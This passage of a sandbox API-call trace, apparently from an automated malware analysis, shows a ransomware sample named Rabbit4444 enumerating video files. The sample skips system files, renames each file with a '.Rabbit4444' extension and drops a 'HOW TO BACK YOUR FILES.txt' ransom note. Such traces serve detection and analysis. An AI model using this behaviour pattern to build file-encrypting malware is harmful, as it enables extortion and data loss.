(lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\_cqQP-g.mkv", dwFileAttributes=0x0) returned 1 [0048.327] lstrlenW (lpString="_cqQP-g.mkv") returned 11 [0048.327] lstrlenW (lpString="Rabbit4444") returned 10 [0048.327] lstrcmpiW (lpString1="cqQP-g.mkv", lpString2="Rabbit4444") returned -1 [0048.327] lstrlenW (lpString=".dll") returned 4 [0048.327] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0048.327] lstrlenW (lpString=".lnk") returned 4 [0048.327] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0048.327] lstrlenW (lpString=".ini") returned 4 [0048.327] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0048.327] lstrlenW (lpString=".sys") returned 4 [0048.327] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0048.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\_cqQP-g.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\_cqqp-g.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.327] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.327] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13963782313) returned 1 [0048.327] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=91514) returned 1 [0048.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0048.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0048.327] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16880, lpName=0x0) returned 0x298 [0048.327] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16880) returned 0x70000 [0048.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.329] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0048.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0048.330] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13964067410) returned 1 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0048.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0048.330] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.331] CloseHandle (hObject=0x298) returned 1 [0048.331] CloseHandle (hObject=0x278) returned 1 [0048.339] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\_cqQP-g.mkv.Rabbit4444") returned 65 [0048.339] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\_cqQP-g.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\_cqqp-g.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\_cqQP-g.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\_cqqp-g.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0048.340] InterlockedExchangeAdd (in: Addend=0xff618, Value=91520 | out: Addend=0xff618) returned 15850576 [0048.340] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3326 [0048.340] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc291ff80, ftCreationTime.dwHighDateTime=0x1d4c648, ftLastAccessTime.dwLowDateTime=0x93d5ac20, ftLastAccessTime.dwHighDateTime=0x1d4d352, ftLastWriteTime.dwLowDateTime=0x93d5ac20, ftLastWriteTime.dwHighDateTime=0x1d4d352, nFileSizeHigh=0x0, nFileSizeLow=0x1657a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_cqQP-g.mkv", cAlternateFileName="")) returned 0 [0048.340] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0048.340] lstrcpyW (in: lpString1=0x130eb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0048.340] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\Mr9We2Kb5L1oUgPF84r\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\mr9we2kb5l1ougpf84r\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0048.340] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0048.341] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0048.342] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.342] CloseHandle (hObject=0x278) returned 1 [0048.342] CloseHandle (hObject=0x27c) returned 1 [0048.343] GetCurrentThreadId () returned 0xd98 [0048.343] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0048.343] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT") returned="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT" [0048.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115928 | out: hHeap=0xe0000) returned 1 [0048.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0048.343] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT") returned="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT" [0048.343] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\") returned="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\" [0048.343] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\.BFC0E91B00AE8A0620D3" [0048.343] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0048.344] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0048.347] FlushFileBuffers (hFile=0x27c) returned 1 [0048.348] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0048.348] CloseHandle (hObject=0x27c) returned 1 [0048.349] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT") returned 43 [0048.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0048.349] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158eba20, ftCreationTime.dwHighDateTime=0x1d4c7cf, ftLastAccessTime.dwLowDateTime=0x4968c110, ftLastAccessTime.dwHighDateTime=0x1d4cec8, ftLastWriteTime.dwLowDateTime=0xe6244c29, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0048.349] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.349] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.349] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0048.349] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0048.349] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x158eba20, ftCreationTime.dwHighDateTime=0x1d4c7cf, ftLastAccessTime.dwLowDateTime=0x4968c110, ftLastAccessTime.dwHighDateTime=0x1d4cec8, ftLastWriteTime.dwLowDateTime=0xe6244c29, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.349] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.349] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0048.349] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0048.349] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0048.349] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0048.349] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe6244c29, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe6244c29, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6244c29, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0048.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.349] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0048.349] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebfe9230, ftCreationTime.dwHighDateTime=0x1d4cf11, ftLastAccessTime.dwLowDateTime=0xcf69ce0, ftLastAccessTime.dwHighDateTime=0x1d4cf57, ftLastWriteTime.dwLowDateTime=0xcf69ce0, ftLastWriteTime.dwHighDateTime=0x1d4cf57, nFileSizeHigh=0x0, nFileSizeLow=0x14f3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1NoZ-i.avi", cAlternateFileName="")) returned 1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="Rabbit4444.exe") returned -1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2=".") returned 1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="..") returned 1 [0048.349] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="windows") returned -1 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="bootmgr") returned -1 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="pagefile.sys") returned -1 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="boot") returned -1 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="ids.txt") returned -1 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="NTUSER.DAT") returned -1 [0048.350] lstrcpyW (in: lpString1=0x130eb90, lpString2="1NoZ-i.avi" | out: lpString1="1NoZ-i.avi") returned="1NoZ-i.avi" [0048.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\1NoZ-i.avi", dwFileAttributes=0x0) returned 1 [0048.350] lstrlenW (lpString="1NoZ-i.avi") returned 10 [0048.350] lstrlenW (lpString="Rabbit4444") returned 10 [0048.350] lstrcmpiW (lpString1="1NoZ-i.avi", lpString2="Rabbit4444") returned -1 [0048.350] lstrlenW (lpString=".dll") returned 4 [0048.350] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.350] lstrlenW (lpString=".lnk") returned 4 [0048.350] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.350] lstrlenW (lpString=".ini") returned 4 [0048.350] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.350] lstrlenW (lpString=".sys") returned 4 [0048.350] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.350] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\1NoZ-i.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\1noz-i.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.350] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.350] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13966107946) returned 1 [0048.350] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=85818) returned 1 [0048.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0048.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0048.351] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15240, lpName=0x0) returned 0x298 [0048.351] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15240) returned 0x70000 [0048.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0048.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0048.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0048.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.353] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0048.353] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13966422930) returned 1 [0048.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0048.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0048.354] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.354] CloseHandle (hObject=0x298) returned 1 [0048.354] CloseHandle (hObject=0x278) returned 1 [0048.357] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\1NoZ-i.avi.Rabbit4444") returned 65 [0048.357] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\1NoZ-i.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\1noz-i.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\1NoZ-i.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\1noz-i.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.358] InterlockedExchangeAdd (in: Addend=0xff618, Value=85824 | out: Addend=0xff618) returned 15942096 [0048.358] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3328 [0048.358] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50934bd0, ftCreationTime.dwHighDateTime=0x1d4cb36, ftLastAccessTime.dwLowDateTime=0xdd97d850, ftLastAccessTime.dwHighDateTime=0x1d4d4a7, ftLastWriteTime.dwLowDateTime=0xdd97d850, ftLastWriteTime.dwHighDateTime=0x1d4d4a7, nFileSizeHigh=0x0, nFileSizeLow=0xcf0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4-CHQqK1j2.avi", cAlternateFileName="4-CHQQ~1.AVI")) returned 1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="Rabbit4444.exe") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2=".") returned 1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="..") returned 1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="windows") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="bootmgr") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="pagefile.sys") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="boot") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="ids.txt") returned -1 [0048.358] lstrcmpiW (lpString1="4-CHQqK1j2.avi", lpString2="NTUSER.DAT") returned -1 [0048.358] lstrcpyW (in: lpString1=0x130eb90, lpString2="4-CHQqK1j2.avi" | out: lpString1="4-CHQqK1j2.avi") returned="4-CHQqK1j2.avi" [0048.358] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\4-CHQqK1j2.avi", dwFileAttributes=0x0) returned 1 [0048.358] lstrlenW (lpString="4-CHQqK1j2.avi") returned 14 [0048.358] lstrlenW (lpString="Rabbit4444") returned 10 [0048.359] lstrcmpiW (lpString1="QqK1j2.avi", lpString2="Rabbit4444") returned -1 [0048.359] lstrlenW (lpString=".dll") returned 4 [0048.359] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0048.359] lstrlenW (lpString=".lnk") returned 4 [0048.359] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0048.359] lstrlenW (lpString=".ini") returned 4 [0048.359] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0048.359] lstrlenW (lpString=".sys") returned 4 [0048.359] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0048.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\4-CHQqK1j2.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\4-chqqk1j2.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0048.359] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0048.359] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13966966734) returned 1 [0048.359] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53004) returned 1 [0048.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0048.359] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0048.359] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd210, lpName=0x0) returned 0x298 [0048.359] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd210) returned 0x70000 [0048.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0048.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0048.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0048.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0048.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0048.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0048.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0048.361] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0048.361] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13967223047) returned 1 [0048.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0048.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0048.362] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0048.362] CloseHandle (hObject=0x298) returned 1 [0048.362] CloseHandle (hObject=0x278) returned 1 [0048.365] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\4-CHQqK1j2.avi.Rabbit4444") returned 69 [0048.365] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\4-CHQqK1j2.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\4-chqqk1j2.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\4-CHQqK1j2.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\4-chqqk1j2.avi.rabbit4444"), dwFlags=0x1) returned 1 [0048.365] InterlockedExchangeAdd (in: Addend=0xff618, Value=53008 | out: Addend=0xff618) returned 16027920 [0048.365] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3331 [0048.365] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1acb57d0, ftCreationTime.dwHighDateTime=0x1d4d4b5, ftLastAccessTime.dwLowDateTime=0x76ae5720, ftLastAccessTime.dwHighDateTime=0x1d4d2ce, ftLastWriteTime.dwLowDateTime=0x76ae5720, ftLastWriteTime.dwHighDateTime=0x1d4d2ce, nFileSizeHigh=0x0, nFileSizeLow=0x9fc2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JPgmUVeD.mp4", cAlternateFileName="")) returned 1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="Rabbit4444.exe") returned -1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2=".") returned 1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="..") returned 1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="windows") returned -1 [0048.365] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="bootmgr") returned 1 [0048.366] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="pagefile.sys") returned -1 [0048.366] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="boot") returned 1 [0048.366] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="ids.txt") returned 1 [0048.366] lstrcmpiW (lpString1="JPgmUVeD.mp4", lpString2="NTUSER.DAT") returned -1 [0048.366] lstrcpyW (in: lpString1=0x130eb90, lpString2="JPgmUVeD.mp4" | out: lpString1="JPgmUVeD.mp4") returned="JPgmUVeD.mp4" [0048.366] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\JPgmUVeD.mp4", dwFileAttributes=0x0) returned 1 [0048.366] lstrlenW (lpString="JPgmUVeD.mp4") returned 12 [0048.366] lstrlenW (lpString="Rabbit4444") returned 10 [0048.366] lstrcmpiW (lpString1="gmUVeD.mp4", lpString2="Rabbit4444") returned -1 [0048.366] lstrlenW (lpString=".dll") returned 4 [0048.366] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0048.366] lstrlenW (lpString=".lnk") returned 4 [0048.366] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0048.366] lstrlenW (lpString=".ini") returned 4 [0048.366] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0048.366] lstrlenW (lpString=".sys") returned 4 [0048.366] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0048.366] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\kyLFwyj3y_- AKUbu7HT\\JPgmUVeD.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kylfwyj3y_- akubu7ht\\jpgmuved.mp4"), dwDesiredAccess=0xe0003, 